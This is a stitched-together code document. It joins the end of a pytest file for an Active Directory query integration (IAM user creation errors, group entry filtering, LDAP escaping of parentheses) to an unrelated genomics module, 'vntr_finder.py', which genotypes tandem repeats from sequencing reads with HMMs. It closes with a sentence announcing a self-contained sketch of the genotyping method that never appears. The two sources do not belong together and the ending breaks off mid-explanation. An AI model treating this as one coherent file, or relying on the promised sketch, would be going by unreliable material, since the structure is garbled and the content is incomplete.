When: Running the `create_user_iam` command Then: - The user was not created in AD. - An error message was returned. """ import Active_Directory_Query add_args, add_kwargs = [], {} class ConnectionMocker: entries = [] result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}} def search(self, *args, **kwargs): return def add(self, *args, **kwargs): nonlocal add_args, add_kwargs add_args, add_kwargs = args, kwargs return True Active_Directory_Query.conn = ConnectionMocker() args = {"user-profile": json.dumps({"email": "[email protected]", "username": "test", "locationregion": "Americas"})} mocker.patch('Active_Directory_Query.check_if_user_exists_by_attribute', return_value=False) mocker.patch.object(IAMUserProfile, 'map_object', return_value={'cn': 'test', 'mail': '[email protected]', 'samaccountname': 'test', 'userPrincipalName': 'test'}) user_profile = Active_Directory_Query.create_user_iam('', args, 'mapper_out', '') outputs = get_outputs_from_user_profile(user_profile) assert outputs.get('action') == IAMActions.CREATE_USER assert outputs.get('success') is False assert outputs.get('email') == '[email protected]' assert 'User must have an Organizational Unit (OU)' in outputs.get('errorMessage') def test_unseccsseful_create_user_iam_missing_samaccountname(mocker): """ Given: A valid user profile with missing samaccountname in the mapping When: Running the `create_user_iam` command Then: - The user was not created in AD. - An error message was returned. 
""" import Active_Directory_Query add_args, add_kwargs = [], {} class ConnectionMocker: entries = [] result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}} def search(self, *args, **kwargs): return def add(self, *args, **kwargs): nonlocal add_args, add_kwargs add_args, add_kwargs = args, kwargs return True Active_Directory_Query.conn = ConnectionMocker() args = {"user-profile": json.dumps({"email": "[email protected]", "username": "test", "locationregion": "Americas"})} mocker.patch('Active_Directory_Query.check_if_user_exists_by_attribute', return_value=False) mocker.patch.object(IAMUserProfile, 'map_object', return_value={'cn': 'test', 'mail': '[email protected]', "ou": "OU=Americas,OU=Demisto", 'userPrincipalName': 'test'}) user_profile = Active_Directory_Query.create_user_iam('', args, 'mapper_out', '') outputs = get_outputs_from_user_profile(user_profile) assert outputs.get('action') == IAMActions.CREATE_USER assert outputs.get('success') is False assert outputs.get('email') == '[email protected]' assert 'User must have a sAMAccountName' in outputs.get('errorMessage') def test_group_entry_no_custom_attributes(): """ Given: Custom attributes to filter the group object entry. When: The function filters the group object according to the custom attributes. Then: The function will return all the group object entry because custom attributes contain '*'. """ from Active_Directory_Query import group_entry custom_attributes_with_asterisk = group_entry({'dn': 'dn', 'name': 'name', 'memberOf': 'memberOf'}, ['*']) assert custom_attributes_with_asterisk == {'Groups': 'memberOf', 'ID': 'dn', 'Name': 'name', 'Type': 'AD'} def test_group_entry(): """ Given: Custom attributes to filter the group object entry. When: The function filters the group object according to the custom attributes. Then: The function will return all the group object entry because custom attributes contain '*'. 
""" from Active_Directory_Query import group_entry custom_attributes_with_asterisk = group_entry({'dn': 'dn', 'name': 'name', 'memberOf': 'memberOf', 'displayName': 'display name'}, ['displayName']) assert custom_attributes_with_asterisk == {'Groups': 'memberOf', 'ID': 'dn', 'Name': 'name', 'Type': 'AD', 'displayName': 'display name'} def test_search_group_members(mocker): """ sanity test for search_group_members method """ import Active_Directory_Query class EntryMocker: def entry_to_json(self): return '{"dn": "dn","attributes": {"memberOf": ["memberOf"], "name": ["name"]}}' class ConnectionMocker: entries = [EntryMocker()] result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}} def search(self, *args, **kwargs): return expected_results = {'ContentsFormat': 'json', 'Type': 1, 'Contents': [{'dn': 'dn', 'attributes': {'memberOf': ['memberOf'], 'name': ['name']}}], 'ReadableContentsFormat': 'markdown', 'HumanReadable': '### Active Directory - Get Group Members\n|' 'dn|memberOf|name|\n|---|---|---|\n| dn | memberOf | name |\n', 'EntryContext': {'ActiveDirectory.Groups(obj.dn ==dn)': {'dn': 'dn', 'members': [ {'dn': 'dn', 'category': 'group'}]}, 'ActiveDirectory.Groups(obj.dn == val.dn)': [{'dn': 'dn', 'memberOf': ['memberOf'], 'name': ['name']}], 'Group': [{'Type': 'AD', 'ID': 'dn', 'Name': ['name'], 'Groups': ['memberOf']}]}} expected_results = f'demisto results: {json.dumps(expected_results, indent=4, sort_keys=True)}' mocker.patch.object(demisto, 'args', return_value={'member-type': 'group', 'group-dn': 'dn'}) Active_Directory_Query.conn = ConnectionMocker() with patch('logging.Logger.info') as mock: Active_Directory_Query.search_group_members('dc', 1) mock.assert_called_with(expected_results) def test_group_dn_escape_characters(): """ Given: Group name with parentheses When: Running the function group_dn Then: The function search gets the group name after escape special characters. """ import Active_Directory_Query class EntryMocker: def entry_to_json(self): return '{"dn": "dn","attributes": {"memberOf": ["memberOf"], "name": ["name"]}}' class ConnectionMocker: entries = [EntryMocker()] result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}} Active_Directory_Query.conn = ConnectionMocker() with patch('Active_Directory_Query.search', return_value=[EntryMocker()]) as mock: group_dn('group(group)', '') mock.assert_called_with('(&(objectClass=group)(cn=group\\28group\\29))', '')
vntr_finder.py
import logging import numpy import os from multiprocessing import Process, Manager, Value, Semaphore from random import random from uuid import uuid4 import pysam from Bio import pairwise2 from Bio.Seq import Seq from blast_wrapper import get_blast_matched_ids, make_blast_database from coverage_bias import CoverageBiasDetector, CoverageCorrector from hmm_utils import * from pacbio_haplotyper import PacBioHaplotyper from pomegranate import HiddenMarkovModel as Model from profiler import time_usage from sam_utils import get_reference_genome_of_alignment_file from sam_utils import get_related_reads_and_read_count_in_samfile import settings from utils import is_low_quality_read class SelectedRead: def __init__(self, sequence, logp, vpath, mapq=None, reference_start=None): self.sequence = sequence self.logp = logp self.vpath = vpath self.mapq = mapq self.is_mapped = reference_start is not None def is_mapped(self): return self.is_mapped class VNTRFinder: """Find the VNTR structure of a reference VNTR in NGS data of the donor.""" def __init__(self, reference_vntr): self.reference_vntr = reference_vntr self.min_repeat_bp_to_add_read = 2 if len(self.reference_vntr.pattern) < 30: self.min_repeat_bp_to_add_read = 2 self.min_repeat_bp_to_count_repeats = 2 self.minimum_left_flanking_size = {} self.minimum_right_flanking_size = {69212: 19, 532789: 12, 400825: 10, 468671: 10} self.vntr_start = self.reference_vntr.start_point self.vntr_end = self.vntr_start + self.reference_vntr.get_length() @time_usage def build_vntr_matcher_hmm(self, copies, flanking_region_size=100): patterns = self.reference_vntr.get_repeat_segments() left_flanking_region = self.reference_vntr.left_flanking_region[-flanking_region_size:] right_flanking_region = self.reference_vntr.right_flanking_region[:flanking_region_size] vntr_matcher = get_read_matcher_model(left_flanking_region, right_flanking_region, patterns, copies) return vntr_matcher def get_vntr_matcher_hmm(self, read_length): """Try to load trained HMM for this VNTR If there was no trained HMM, it will build one and store it for later usage """ logging.info('Using read length %s' % read_length) copies = int(round(float(read_length) / len(self.reference_vntr.pattern) + 0.5)) base_name = str(self.reference_vntr.id) + '_' + str(read_length) + '.json' stored_hmm_file = settings.TRAINED_HMMS_DIR + base_name if settings.USE_TRAINED_HMMS and os.path.isfile(stored_hmm_file): model = Model() model = model.from_json(stored_hmm_file) return model flanking_region_size = read_length vntr_matcher = self.build_vntr_matcher_hmm(copies, flanking_region_size) json_str = vntr_matcher.to_json() with open(stored_hmm_file, 'w') as outfile: outfile.write(json_str) return vntr_matcher @time_usage def filter_reads_with_keyword_matching(self, working_directory, read_file, short_reads=True): db_name = 'blast_db__' + os.path.basename(read_file) blast_db_name = working_directory + db_name empty_db = False if not os.path.exists(blast_db_name + '.nsq') and not os.path.exists(blast_db_name + '.nal'): empty_db = make_blast_database(read_file, blast_db_name) word_size = int(len(self.reference_vntr.pattern)/3) if word_size > 11: word_size = 11 if word_size < 5: word_size = 5 word_size = str(word_size) search_results = [] blast_ids = set([]) search_id = str(uuid4()) + str(self.reference_vntr.id) queries = self.reference_vntr.get_repeat_segments() if len(self.reference_vntr.pattern) < 10: min_copies = int(10 / len(self.reference_vntr.pattern)) queries = [self.reference_vntr.pattern * min_copies] 
identity_cutoff = '0' if not short_reads: queries = [self.reference_vntr.left_flanking_region[-80:], self.reference_vntr.right_flanking_region[:80]] word_size = str('10') identity_cutoff = '70' if not empty_db: for query in queries: search_result = get_blast_matched_ids(query, blast_db_name, max_seq='50000', word_size=word_size, evalue=10, search_id=search_id, identity_cutoff=identity_cutoff) search_results.append(search_result) if short_reads: for search_result in search_results: blast_ids |= search_result else: blast_ids = search_results[0] & search_results[1] logging.info('blast selected %s reads for %s' % (len(blast_ids), self.reference_vntr.id)) if len(blast_ids) == len(self.reference_vntr.get_repeat_segments()) * 50 * 1000: logging.error('maximum number of read selected in filtering for pattern %s' % self.reference_vntr.id) return blast_ids @staticmethod def add_hmm_score_to_list(sema, hmm, read, result_scores): logp, vpath = hmm.viterbi(str(read.seq)) rev_logp, rev_vpath = hmm.viterbi(str(Seq(str(read.seq)).reverse_complement())) if logp < rev_logp: logp = rev_logp result_scores.append(logp) sema.release() def is_true_read(self, read): read_start = read.reference_start reference_name = read.reference_name if not reference_name.startswith('chr'): reference_name = 'chr' + reference_name if reference_name == self.reference_vntr.chromosome and self.vntr_start - len(read.seq) < read_start < self.vntr_end: return True return False def find_score_distribution_of_ref(self, samfile, reference, hmm, false_scores, true_scores): process_list = [] sema = Semaphore(settings.CORES) for read in samfile.fetch(reference, multiple_iterators=True): if read.is_unmapped: continue if read.seq.count('N') > 0: continue if self.is_true_read(read): sema.acquire() p = Process(target=VNTRFinder.add_hmm_score_to_list, args=(sema, hmm, read, true_scores)) else: if random() > settings.SCORE_FINDING_READS_FRACTION: continue sema.acquire() p = Process(target=VNTRFinder.add_hmm_score_to_list, args=(sema, hmm, read, false_scores)) process_list.append(p) p.start() for p in process_list: p.join() def save_scores(self, true_scores, false_scores, alignment_file): with open('true_scores_dist_%s_%s' % (self.reference_vntr.id, os.path.basename(alignment_file)), 'w') as out: for score in true_scores: out.write('%.4f\n' % score) with open('false_scores_dist_%s_%s' % (self.reference_vntr.id, os.path.basename(alignment_file)), 'w') as out: for score in false_scores: out.write('%.4f\n' % score) @time_usage def calculate_min_score_to_select_a_read(self, hmm, alignment_file): """Calculate the score distribution of false positive reads and return score to select the 1e-8 percentile of the distribution """ process_list = [] manager = Manager() false_scores = manager.list() true_scores = manager.list() read_mode = 'r' if alignment_file.endswith('sam') else 'rb' samfile = pysam.AlignmentFile(alignment_file, read_mode) refs = [ref for ref in samfile.references if ref in settings.CHROMOSOMES or 'chr' + ref in settings.CHROMOSOMES] for ref in refs: p = Process(target=self.find_score_distribution_of_ref, args=(samfile, ref, hmm, false_scores, true_scores)) process_list.append(p) p.start() for p in process_list: p.join() if settings.SAVE_SCORE_DISTRIBUTION: self.save_scores(true_scores, false_scores, alignment_file) score = numpy.percentile(false_scores, 100 - settings.SCORE_SELECTION_PERCENTILE) return score def get_min_score_to_select_a_read(self, hmm, alignment_file, read_length): """Try to load the minimum score for this VNTR If the 
score is not stored, it will compute the score and write it for this VNTR in precomputed data. """ base_name = str(self.reference_vntr.id) + '.scores' stored_scores_file = settings.TRAINED_HMMS_DIR + base_name if settings.USE_TRAINED_HMMS and os.path.isfile(stored_scores_file): with open(stored_scores_file, 'r') as infile: lines = [line.split() for line in infile.readlines() if line.strip() != ''] for stored_length, fraction, score in lines: if int(stored_length) == read_length and settings.SCORE_FINDING_READS_FRACTION == float(fraction): return float(score) elif settings.SCALE_SCORES and settings.SCORE_FINDING_READS_FRACTION == float(fraction): return float(score) * (read_length / int(stored_length)) logging.debug('Minimum score is not precomputed for vntr id: %s' % self.reference_vntr.id) score = self.calculate_min_score_to_select_a_read(hmm, alignment_file) logging.debug('computed score: %s' % score) with open(stored_scores_file, 'a') as outfile: outfile.write('%s %s %s\n' % (read_length, settings.SCORE_FINDING_READS_FRACTION, score)) return score def process_unmapped_read(self, sema, read_segment, hmm, min_score_to_count_read, vntr_bp_in_unmapped_reads, selected_reads, best_seq): if read_segment.seq.count('N') <= 0: sequence = str(read_segment.seq) logp, vpath = hmm.viterbi(sequence) rev_logp, rev_vpath = hmm.viterbi(str(read_segment.seq.reverse_complement())) if logp < rev_logp: sequence = str(read_segment.seq.reverse_complement()) logp = rev_logp vpath = rev_vpath if logp > best_seq['logp']: best_seq['logp'] = logp best_seq['seq'] = sequence best_seq['vpath'] = vpath repeat_bps = get_number_of_repeat_bp_matches_in_vpath(vpath) if logp > min_score_to_count_read: if repeat_bps > self.min_repeat_bp_to_count_repeats: vntr_bp_in_unmapped_reads.value += repeat_bps if repeat_bps > self.min_repeat_bp_to_add_read: selected_reads.append(SelectedRead(sequence, logp, vpath)) sema.release() def find_frameshift_from_selected_reads(self, selected_reads): mutations = {} repeating_bps_in_data = 0 repeats_lengths_distribution = [] for read in selected_reads: visited_states = [state.name for idx, state in read.vpath[1:-1]] repeats_lengths = get_repeating_pattern_lengths(visited_states) repeats_lengths_distribution += repeats_lengths current_repeat = None repeating_bps_in_data += get_number_of_repeat_bp_matches_in_vpath(read.vpath) for i in range(len(visited_states)): if visited_states[i].endswith('fix') or visited_states[i].startswith('M'): continue if visited_states[i].startswith('unit_start'): if current_repeat is None: current_repeat = 0 else: current_repeat += 1 if current_repeat is None or current_repeat >= len(repeats_lengths): continue if not visited_states[i].startswith('I') and not visited_states[i].startswith('D'): continue if repeats_lengths[current_repeat] == len(self.reference_vntr.pattern): continue state = visited_states[i].split('_')[0] if state.startswith('I'): state += get_emitted_basepair_from_visited_states(visited_states[i], visited_states, read.sequence) if abs(repeats_lengths[current_repeat] - len(self.reference_vntr.pattern)) <= 2: if state not in mutations.keys(): mutations[state] = 0 mutations[state] += 1 sorted_mutations = sorted(mutations.items(), key=lambda x: x[1]) logging.debug('sorted mutations: %s ' % sorted_mutations) frameshift_candidate = sorted_mutations[-1] if len(sorted_mutations) else (None, 0) logging.info(sorted(repeats_lengths_distribution)) logging.info('Frameshift Candidate and Occurrence %s: %s' % frameshift_candidate) logging.info('Observed repeating base 
pairs in data: %s' % repeating_bps_in_data) avg_bp_coverage = float(repeating_bps_in_data) / self.reference_vntr.get_length() logging.info('Average coverage for each base pair: %s' % avg_bp_coverage) if frameshift_candidate[1] > avg_bp_coverage / 4: logging.info('There is a frameshift at %s' % frameshift_candidate[0]) return frameshift_candidate[0] return None def read_flanks_repeats_with_confidence(self, vpath): minimum_left_flanking = 5 minimum_right_flanking = 5 if self.reference_vntr.id in self.minimum_left_flanking_size: minimum_left_flanking = self.minimum_left_flanking_size[self.reference_vntr.id] if self.reference_vntr.id in self.minimum_right_flanking_size: minimum_right_flanking = self.minimum_right_flanking_size[self.reference_vntr.id] if get_left_flanking_region_size_in_vpath(vpath) > minimum_left_flanking: if get_right_flanking_region_size_in_vpath(vpath) > minimum_right_flanking: return True return False def check_if_flanking_regions_align_to_str(self, read_str, length_distribution, spanning_reads): flanking_region_size = 100 left_flanking = self.reference_vntr.left_flanking_region[-flanking_region_size:] right_flanking = self.reference_vntr.right_flanking_region[:flanking_region_size] left_alignments = pairwise2.align.localms(read_str, left_flanking, 1, -1, -1, -1) if len(left_alignments) < 1: return min_left, max_left = 10e9, 0 for aln in left_alignments: if aln[2] < len(left_flanking) * (1 - 0.3): continue min_left = min(min_left, aln[3]) max_left = max(max_left, aln[3]) if max_left - min_left > 30: with open('vntr_complex.txt', 'a') as out: out.write('%s %s\n' % (self.reference_vntr.id, max_left - min_left)) left_align = left_alignments[0] if left_align[2] < len(left_flanking) * (1 - settings.MAX_ERROR_RATE): return right_alignments = pairwise2.align.localms(read_str, right_flanking, 1, -1, -1, -1) if len(right_alignments) < 1: return min_right, max_right = 10e9, 0 for aln in right_alignments: if aln[2] < len(right_flanking) * (1 - 0.3): continue min_right = min(min_right, aln[3]) max_right = max(max_right, aln[3]) if max_right - min_right > 30: with open('vntr_complex.txt', 'a') as out: out.write('%s %s\n' % (self.reference_vntr.id, max_right - min_right)) right_align = right_alignments[0] if right_align[2] < len(right_flanking) * (1 - settings.MAX_ERROR_RATE): return if right_align[3] < left_align[3]: return spanning_reads.append(read_str[left_align[3]:right_align[3]+flanking_region_size].upper()) length_distribution.append(right_align[3] - (left_align[3] + flanking_region_size)) def check_if_pacbio_read_spans_vntr(self, sema, read, length_distribution, spanning_reads): self.check_if_flanking_regions_align_to_str(str(read.seq), length_distribution, spanning_reads) reverse_complement_str = str(Seq(str(read.seq)).reverse_complement()) self.check_if_flanking_regions_align_to_str(reverse_complement_str, length_distribution, spanning_reads) sema.release() def check_if_pacbio_mapped_read_spans_vntr(self, sema, read, length_distribution, spanning_reads): flanking_region_size = 100 region_start = self.reference_vntr.start_point - flanking_region_size region_end = self.reference_vntr.start_point + self.reference_vntr.get_length() if read.get_reference_positions()[0] < region_start and read.get_reference_positions()[-1] > region_end: read_region_start = None read_region_end = None for read_pos, ref_pos in enumerate(read.get_reference_positions()): if ref_pos >= region_start and read_region_start is None: read_region_start = read_pos if ref_pos >= region_end and read_region_end is 
None: read_region_end = read_pos if read_region_start is not None and read_region_end is not None: result = read.seq[read_region_start:read_region_end+flanking_region_size] if read.is_reverse: result = str(Seq(result).reverse_complement()) spanning_reads.append(result) length_distribution.append(len(result) - flanking_region_size * 2) sema.release() @time_usage def get_spanning_reads_of_unaligned_pacbio_reads(self, unmapped_filtered_reads): sema = Semaphore(settings.CORES) manager = Manager() shared_length_distribution = manager.list() shared_spanning_reads = manager.list() process_list = [] for read in unmapped_filtered_reads: sema.acquire() p = Process(target=self.check_if_pacbio_read_spans_vntr, args=(sema, read, shared_length_distribution, shared_spanning_reads)) process_list.append(p) p.start() for p in process_list: p.join() logging.info('length_distribution of unmapped spanning reads: %s' % list(shared_length_distribution)) return list(shared_spanning_reads), list(shared_length_distribution) @time_usage def get_spanning_reads_of_aligned_pacbio_reads(self, alignment_file): sema = Semaphore(settings.CORES) manager = Manager() length_distribution = manager.list() mapped_spanning_reads = manager.list() vntr_start = self.reference_vntr.start_point vntr_end = self.reference_vntr.start_point + self.reference_vntr.get_length() region_start = vntr_start region_end = vntr_end read_mode = 'r' if alignment_file.endswith('sam') else 'rb' samfile = pysam.AlignmentFile(alignment_file, read_mode) reference = get_reference_genome_of_alignment_file(samfile) chromosome = self.reference_vntr.chromosome if reference == 'HG19' else self.reference_vntr.chromosome[3:] process_list = [] for read in samfile.fetch(chromosome, region_start, region_end): sema.acquire() p = Process(target=self.check_if_pacbio_read_spans_vntr, args=(sema, read, length_distribution, mapped_spanning_reads)) process_list.append(p) p.start() for p in process_list: p.join() logging.info('length_distribution of mapped spanning reads: %s' % list(length_distribution)) return list(mapped_spanning_reads) def get_conditional_likelihood(self, ck, ci, cj, ru_counts, r, r_e): if ck == ci == cj: return 1-r if cj == 0: # CHECK LATER return 0.5 * (1-r) if ck == ci: return 0.5 * ((1-r) + r_e ** abs(ck-cj)) if ck == cj: return 0.5 * ((1-r) + r_e ** abs(ck-ci)) if ck != ci and ck != cj: return 0.5 * (r_e ** abs(ck-ci) + r_e ** abs(ck-cj)) def find_genotype_based_on_observed_repeats(self, observed_copy_numbers): ru_counts = {} for cn in observed_copy_numbers: if cn not in ru_counts.keys(): ru_counts[cn] = 0 ru_counts[cn] += 1 if len(ru_counts.keys()) < 2: priors = 0.5 ru_counts[0] = 1 else: priors = 1.0 / (len(ru_counts.keys()) * (len(ru_counts.keys())-1) / 2) import operator ru_counts = sorted(ru_counts.items(), key=operator.itemgetter(1), reverse=True) r = 0.03 r_e = r / (2 + r) prs = {} for ck, occ in ru_counts: if ck == 0: continue for i in range(len(ru_counts)): ci = ru_counts[i][0] for j in range(len(ru_counts)): if j < i: continue cj = ru_counts[j][0] if (ci, cj) not in prs.keys(): prs[(ci, cj)] = [] prs[(ci, cj)].append(self.get_conditional_likelihood(ck, ci, cj, ru_counts, r, r_e) ** occ) posteriors = {} import numpy for key in prs.keys(): prs[key] = numpy.prod(numpy.array(prs[key])) posteriors[key] = prs[key] * priors sum_of_probs = sum(posteriors.values()) max_prob = 1e-20 result = None for key, value in posteriors.items(): if value / sum_of_probs > max_prob: max_prob = value / sum_of_probs result = key logging.info('Maximum probability 
for genotyping: %s' % max_prob) return result def get_dominant_copy_numbers_from_spanning_reads(self, spanning_reads): if len(spanning_reads) < 1: logging.info('There is no spanning read') return None max_length = 0 for read in spanning_reads: if len(read) - 100 > max_length: max_length = len(read) - 100 max_copies = int(round(max_length / float(len(self.reference_vntr.pattern)))) # max_copies = min(max_copies, 2 * len(self.reference_vntr.get_repeat_segments())) vntr_matcher = self.build_vntr_matcher_hmm(max_copies) observed_copy_numbers = [] for haplotype in spanning_reads: logp, vpath = vntr_matcher.viterbi(haplotype) rev_logp, rev_vpath = vntr_matcher.viterbi(str(Seq(haplotype).reverse_complement())) if logp < rev_logp: vpath = rev_vpath observed_copy_numbers.append(get_number_of_repeats_in_vpath(vpath)) logging.info('flanked repeats: %s' % observed_copy_numbers) return self.find_genotype_based_on_observed_repeats(observed_copy_numbers) @time_usage def get_haplotype_copy_numbers_from_spanning_reads(self, spanning_reads): if len(spanning_reads) < 1: logging.info('There is no spanning read') return None max_length = 0 for read in spanning_reads: if len(read) - 100 > max_length: max_length = len(read) - 100 max_copies = int(round(max_length / float(len(self.reference_vntr.pattern)))) max_copies = min(max_copies, 2 * len(self.reference_vntr.get_repeat_segments())) vntr_matcher = self.build_vntr_matcher_hmm(max_copies) haplotyper = PacBioHaplotyper(spanning_reads) haplotypes = haplotyper.get_error_corrected_haplotypes() copy_numbers = [] for haplotype in haplotypes: # print('haplotype: %s' % haplotype) logp, vpath = vntr_matcher.viterbi(haplotype) rev_logp, rev_vpath = vntr_matcher.viterbi(str(Seq(haplotype).reverse_complement())) if logp < rev_logp: vpath = rev_vpath copy_numbers.append(get_number_of_repeats_in_vpath(vpath)) return copy_numbers @time_usage def find_repeat_count_from_pacbio_alignment_file(self, alignment_file, unmapped_filtered_reads): logging.debug('finding repeat count from pacbio alignment file for %s' % self.reference_vntr.id) unaligned_spanning_reads, length_dist = self.get_spanning_reads_of_unaligned_pacbio_reads(unmapped_filtered_reads) mapped_spanning_reads = self.get_spanning_reads_of_aligned_pacbio_reads(alignment_file) spanning_reads = mapped_spanning_reads + unaligned_spanning_reads copy_numbers = self.get_dominant_copy_numbers_from_spanning_reads(spanning_reads) return copy_numbers @time_usage def find_repeat_count_from_pacbio_reads(self, unmapped_filtered_reads, naive=False): logging.debug('finding repeat count from pacbio reads file for %s' % self.reference_vntr.id) spanning_reads, length_dist = self.get_spanning_reads_of_unaligned_pacbio_reads(unmapped_filtered_reads) if naive: if len(length_dist): average_length = sum(length_dist) / float(len(length_dist)) copy_numbers = [round(average_length / len(self.reference_vntr.pattern))] * 2 else: copy_numbers = None else: copy_numbers = self.get_dominant_copy_numbers_from_spanning_reads(spanning_reads) return copy_numbers @time_usage def select_illumina_reads(self, alignment_file, unmapped_filtered_reads): hmm = None min_score_to_count_read = None sema = Semaphore(settings.CORES) manager = Manager() selected_reads = manager.list() vntr_bp_in_unmapped_reads = Value('d', 0.0) number_of_reads = 0 read_length = 150 process_list = [] best_seq = manager.dict() best_seq['logp'] = -10e8 best_seq['vpath'] = '' best_seq['seq'] = '' for read_segment in unmapped_filtered_reads: if number_of_reads == 0: read_length = 
len(str(read_segment.seq)) number_of_reads += 1 if not hmm: hmm = self.get_vntr_matcher_hmm(read_length=read_length) min_score_to_count_read = self.get_min_score_to_select_a_read(hmm, alignment_file, read_length) if len(read_segment.seq) < read_length: continue sema.acquire() p = Process(target=self.process_unmapped_read, args=(sema, read_segment, hmm, min_score_to_count_read, vntr_bp_in_unmapped_reads, selected_reads, best_seq)) process_list.append(p) p.start() for p in process_list: p.join() logging.debug('vntr base pairs in unmapped reads: %s' % vntr_bp_in_unmapped_reads.value) logging.debug('highest logp in unmapped reads: %s' % best_seq['logp']) logging.debug('best sequence %s' % best_seq['seq']) logging.debug('best vpath: %s' % [state.name for idx, state in list(best_seq['vpath'])[1:-1]]) vntr_bp_in_mapped_reads = 0 vntr_start = self.reference_vntr.start_point vntr_end = self.reference_vntr.start_point + self.reference_vntr.get_length() read_mode = 'r' if alignment_file.endswith('sam') else 'rb' samfile = pysam.AlignmentFile(alignment_file, read_mode) reference = get_reference_genome_of_alignment_file(samfile) chromosome = self.reference_vntr.chromosome if reference == 'HG19' else self.reference_vntr.chromosome[3:] for read in samfile.fetch(chromosome, vntr_start, vntr_end): if not hmm: read_length = len(read.seq) hmm = self.get_vntr_matcher_hmm(read_length=read_length) min_score_to_count_read = self.get_min_score_to_select_a_read(hmm, alignment_file, read_length) if read.is_unmapped: continue if len(read.seq) < int(read_length * 0.9): logging.debug('Rejecting read for short length: %s' % read.seq) continue read_end = read.reference_end if read.reference_end else read.reference_start + len(read.seq) if vntr_start - read_length < read.reference_start < vntr_end or vntr_start < read_end < vntr_end: if read.seq.count('N') <= 0: sequence = str(read.seq) logp, vpath = hmm.viterbi(sequence) rev_logp, rev_vpath = hmm.viterbi(str(Seq(read.seq).reverse_complement())) if logp < rev_logp: sequence = str(Seq(read.seq).reverse_complement()) logp = rev_logp vpath = rev_vpath if is_low_quality_read(read) and logp < min_score_to_count_read: logging.debug('Rejected Read: %s' % sequence) continue selected_reads.append(SelectedRead(sequence, logp, vpath, read.mapq, read.reference_start)) end = min(read_end, vntr_end) start = max(read.reference_start, vntr_start) vntr_bp_in_mapped_reads += end - start logging.debug('vntr base pairs in mapped reads: %s' % vntr_bp_in_mapped_reads) return selected_reads @time_usage def find_frameshift_from_alignment_file(self, alignment_file, unmapped_filtered_reads): logging.debug('finding frameshift from alignment file for %s' % self.reference_vntr.id) selected_reads = self.select_illumina_reads(alignment_file, unmapped_filtered_reads) return self.find_frameshift_from_selected_reads(selected_reads) @time_usage def find_repeat_count_from_alignment_file(self, alignment_file, unmapped_filtered_reads): logging.debug('finding repeat count from alignment file for %s' % self.reference_vntr.id) selected_reads = self.select_illumina_reads(alignment_file, unmapped_filtered_reads) covered_repeats = [] flanking_repeats = [] total_counted_vntr_bp = 0 for selected_read in selected_reads: repeats = get_number_of_repeats_in_vpath(selected_read.vpath) total_counted_vntr_bp += get_number_of_repeat_bp_matches_in_vpath(selected_read.vpath) logging.debug('logp of read: %s' % str(selected_read.logp)) logging.debug('left flankign size: %s' % 
get_left_flanking_region_size_in_vpath(selected_read.vpath)) logging.debug('right flanking size: %s' % get_right_flanking_region_size_in_vpath(selected_read.vpath)) logging.debug(selected_read.sequence) visited_states = [state.name for idx, state in selected_read.vpath[1:-1]] if self.read_flanks_repeats_with_confidence(selected_read.vpath): logging.debug('spanning read visited states :%s' % visited_states) logging.debug('repeats: %s' % repeats) covered_repeats.append(repeats) else: flanking_repeats.append(repeats) flanking_repeats = reversed(sorted(flanking_repeats)) logging.info('flanked repeats: %s' % covered_repeats) logging.info('observed repeats: %s' % sorted(flanking_repeats)) min_valid_flanked = max(covered_repeats) if len(covered_repeats) > 0 else 0 max_flanking_repeat = [r for r in flanking_repeats if r == max(flanking_repeats) and r >= min_valid_flanked] if len(max_flanking_repeat) < 5: max_flanking_repeat = [] if self.reference_vntr.id not in settings.LONG_VNTRS: genotype = self.find_genotype_based_on_observed_repeats(covered_repeats + max_flanking_repeat) return genotype pattern_occurrences = total_counted_vntr_bp / float(len(self.reference_vntr.pattern)) read_mode = 'r' if alignment_file.endswith('sam') else 'rb' samfile = pysam.AlignmentFile(alignment_file, read_mode) reference = get_reference_genome_of_alignment_file(samfile) bias_detector = CoverageBiasDetector(alignment_file, self.reference_vntr.chromosome, reference) coverage_corrector = CoverageCorrector(bias_detector.get_gc_content_coverage_map()) logging.info('Sequencing mean coverage: %s' % coverage_corrector.get_sequencing_mean_coverage()) observed_copy_number = pattern_occurrences / coverage_corrector.get_sequencing_mean_coverage() scaled_copy_number = coverage_corrector.get_scaled_coverage(self.reference_vntr, observed_copy_number) logging.info('scaled copy number and observed copy number: %s, %s' % (scaled_copy_number, observed_copy_number)) return [scaled_copy_number] def find_repeat_count_from_short_reads(self, short_read_files, working_directory='./'): """ Map short read sequencing data to human reference genome (hg19) and call find_repeat_count_from_alignment_file :param short_read_files: short read sequencing data :param working_directory: directory for generating the outputs """ alignment_file = '' + short_read_files # TODO: use bowtie2 to map short reads to hg19 return self.find_repeat_count_from_alignment_file(alignment_file, working_directory) def find_accuracy(self, samfile='original_reads/paired_dat.sam'): """Find sensitivity and false positive reads for a set of simulated data """ reference_end_pos = self.reference_vntr.start_point + self.reference_vntr.get_length() related_reads, read_count = get_related_reads_and_read_count_in_samfile(self.reference_vntr.pattern, self.reference_vntr.start_point, read_file=samfile, pattern_end=reference_end_pos) # TODO selected_reads = [] occurrences = 0 avg_coverage = 1 true_positives = [read for read in selected_reads if read in related_reads] false_positives = [read for read in selected_reads if read not in true_positives] false_negatives = [read for read in related_reads if read not in selected_reads] # print('TP:', len(true_positives), 'FP:', len(false_positives), 'selected:', len(selected_reads)) # print('FN:', len(false_negatives)) sensitivity = float(len(true_positives)) / len(related_reads) if len(related_reads) > 0 else 0 if sensitivity > 0.9: print(sensitivity, len(false_positives)) if 1 > sensitivity > 0.9 and len(false_negatives) > 0 and 
len(false_positives) > 0: print('sensitivity ', sensitivity, ' FN:', false_negatives[0], ' FP:', false_positives[0]) with open('FP_and_sensitivity_HMM_read_scoring_method.txt', 'a') as outfile: outfile.write('%s\t%s\t%s\t%s\t%s\n' % ( len(false_positives), sensitivity, self.reference_vntr.id, len(self.reference_vntr.pattern), len(true_positives))) error = abs(len(self.reference_vntr.get_repeat_segments()) - occurrences / avg_coverage) print(error)
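The genotype call above (find_genotype_based_on_observed_repeats) picks the pair of haplotype copy numbers with the highest posterior given the per-read repeat counts, using a conditional likelihood that decays geometrically with the distance between an observation and the nearest allele. The following is a minimal, self-contained sketch of that idea; the flat prior over candidate pairs, the omission of the zero-count special case, and the example counts are simplifications for illustration, not the tool's exact behaviour.

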